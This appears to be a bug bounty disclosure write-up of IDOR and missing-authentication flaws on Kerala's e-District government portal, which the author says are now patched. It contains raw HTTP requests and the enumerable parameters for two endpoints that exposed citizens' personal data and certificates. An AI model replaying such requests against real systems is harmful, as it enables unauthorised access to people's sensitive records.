I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
Hi Hackers!! I am again back with a new vulnerability on the Kerala Government website.
For those who don’t know me, Search my name on Google “Krishnadev P Melevila”
The target site was: http://edistrict.kerala.gov.in/
What is E-District Portal?
Kerala E-District project intend to provide Government services to citizens through Common Service Centers(CSC) which are easily accessible. Services from different departments are brought under one umbrella at any CSC. Some of the services are also made available through online portal. It utilizes backend computerization to e-enable the delivery of services and ensures transparency and uniform application of rules. The project involves integrated and seamless delivery of services to public by automation, integration and incorporating Business Process Re-Engineering(BPR) where ever required. In a nutshell Edistrict is a tailor made program for minimizing effort and time to provide prompt and effective services to the public.
So let’s start,
Vulnerability: IDOR + IMPROPER AUTHENTICATION
Impact: CRITICAL
Risks: ATTACKER CAN VIEW/EDIT/MODIFY DATA OF USERS (VICTIM).
Priority: P0
SCOPE: ATTACKER CAN DOWNLOAD OTHER USERS CERTIFICATES,
VIEW/EDIT/MODIFY OTHER USERS SENSITIVE DATA. TOTAL ACCESS
CONTROL
Steps to reproduce in attackers POV:
1. Two endpoints are vulnerable.
POST /dwr/call/plaincall/registrationDAO.getApplicantAgeGenDWR.dwr HTTP/1.1
Host: edistrict.kerala.gov.in
Cookie: <REDACTED>
Content-Length: 344
Sec-Ch-Ua: <REDACTED>
User-Agent: <REDACTED>
Content-Type: text/plain
Accept: */*
Origin: https://edistrict.kerala.gov.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <REDACTED>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close
callCount=1
windowName=
c0-scriptName=registrationDAO
c0-methodName=getApplicantAgeGenDWR
c0-id=0
c0-param0=number:3735XXXX
batchId=4
instanceId=0
page=<REDACTED>
Following is the investigation on this endpoint:
❖ Cookie/Session validation is not done.
❖ IDOR detected
❖ If the attacker changes the ‘c0-param0=number’ parameter from ‘3735XXXX’ to
any other similar value, the attacker will get some random user sensitive information such as National identification number, Age, Phone, Email, Income details, etc….
SECOND ONE
POST /openSearch.do HTTP/1.1
Host: edistrict.kerala.gov.in
Cookie: <REDACTED>
JSESSIONID=8Bd+K88MaOh-XbWczEiY0g__.node1
Content-Length: 348
Cache-Control: <REDACTED>
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: <REDACTED>
Upgrade-Insecure-Requests: 1
Origin: https://edistrict.kerala.gov.in
Content-Type: application/x-www-form-urlencoded
User-Agent: <REDACTED>
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q
=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:<REDACTED>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close
s_code=RC&updated_date=&tknName=token&token=16516737194326072874285415736384&action=&fromDat
eHidden=&toDateHidden=&tknName=token&token=16516737194326072874285415736384&tknName=token&lo
gin=&navigate=&txtApplicationNo=&userHidden=&receiptHidden=&searchService=qrPrint&srvceType=
cert&applNo=70913065&appno=&proceedingform=&servicetype=Non-Creamy+Layer
Following is the investigation on this endpoint:
❖ Parameter “cert&applNo” is vulnerable to IDOR.
❖ No session/cookie validation.
By exploiting this endpoint, attackers can download other users' certificates issued by the government.
PROOF
That's the end of it!! Now I had totally reported 3 vulnerabilities to National Informatics Center and 3 had been patched.
My first vulnerability on NIC: https://medium.com/bugbountywriteup/exposing-millions-of-critical-data-on-kerala-civil-supplies-website-cc3a4bed5d07
My second vulnerability on NIC: https://medium.com/bugbountywriteup/api-authentication-bypass-on-national-informatics-centre-d438b3bae085
My other bug reports: https://medium.com/@krishnadevpmelevila
Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!
I need your support to write more, Buy me a coffee pls: https://www.buymeacoffee.com/krishnadevpm
My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My Personnel website: http://krishnadevpmelevila.com/